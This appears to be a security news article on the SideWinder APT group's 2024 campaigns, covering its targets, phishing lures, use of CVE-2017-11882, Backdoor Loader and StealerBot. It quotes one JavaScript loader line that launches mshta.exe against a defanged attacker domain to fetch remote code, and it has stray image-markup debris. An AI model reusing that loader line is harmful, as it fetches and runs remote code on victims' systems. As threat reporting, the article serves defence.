Cybersecurity researchers have identified intensified activity from the SideWinder APT group throughout 2024, with significant updates to their toolset and expanded targeting beyond traditional military and government entities.
Recent findings reveal that SideWinder has developed a massive new infrastructure to distribute malware and control compromised systems, with a notable increase in attacks against maritime infrastructures, logistics companies, and entities related to nuclear energy.
SideWinder’s operations have extended geographically to include targets across South Asia, Southeast Asia, the Middle East, and Africa. The group has demonstrated a particular interest in targets within Egypt following earlier campaigns focused on Djibouti.
Affected countries include Austria, Bangladesh, Cambodia, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, UAE, and Vietnam, among others.
Researchers at Securelist note that SideWinder continuously improves its toolset to evade security software detection, extend persistence on compromised networks, and conceal its presence.
The group responds rapidly to detection of their tools, often generating modified malware versions within five hours of discovery.
This level of agility and sophistication makes the threat actor particularly dangerous despite their reliance on older exploitation techniques.
The primary infection vector remains consistent with previous campaigns, using spear-phishing emails containing weaponized documents.
.webp){kind=spacer}
These documents employ themes related to nuclear power plants, maritime infrastructures, governmental decisions, or diplomatic issues to trick victims into opening malicious attachments.
Attack Chain
The infection process begins when targets open malicious DOCX files attached to spear-phishing emails.
These documents implement remote template injection to download RTF files from attacker-controlled servers.
The RTF files exploit CVE-2017-11882, a known Microsoft Office vulnerability, to execute malicious shellcode.
This shellcode launches JavaScript via the mshtml.RunHTMLApplication function, as shown in the following code:-
javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe
https://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();").webp)
The JavaScript loader validates system specifications, terminates if RAM is less than 950MB, and otherwise proceeds to download additional components.
The attack chain ultimately installs the “Backdoor Loader” malware, which is sideloaded using legitimate signed applications.
This loader then deploys the “StealerBot” implant, a sophisticated post-exploitation toolkit used exclusively by SideWinder.
The latest variants of the Backdoor Loader have been distributed under various filenames, including JetCfg.dll, policymanager.dll, winmm.dll, xmllite.dll, dcntel.dll, and UxTheme.dll.
These new malware variants feature enhanced anti-analysis code and employ Control Flow Flattening more extensively to evade detection, highlighting the group’s continued evolution and technical sophistication.
These findings shows the importance of patching systems against even older vulnerabilities like CVE-2017-11882, as sophisticated threat actors continue to leverage them in targeted campaigns against high-value sectors and critical infrastructure worldwide.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
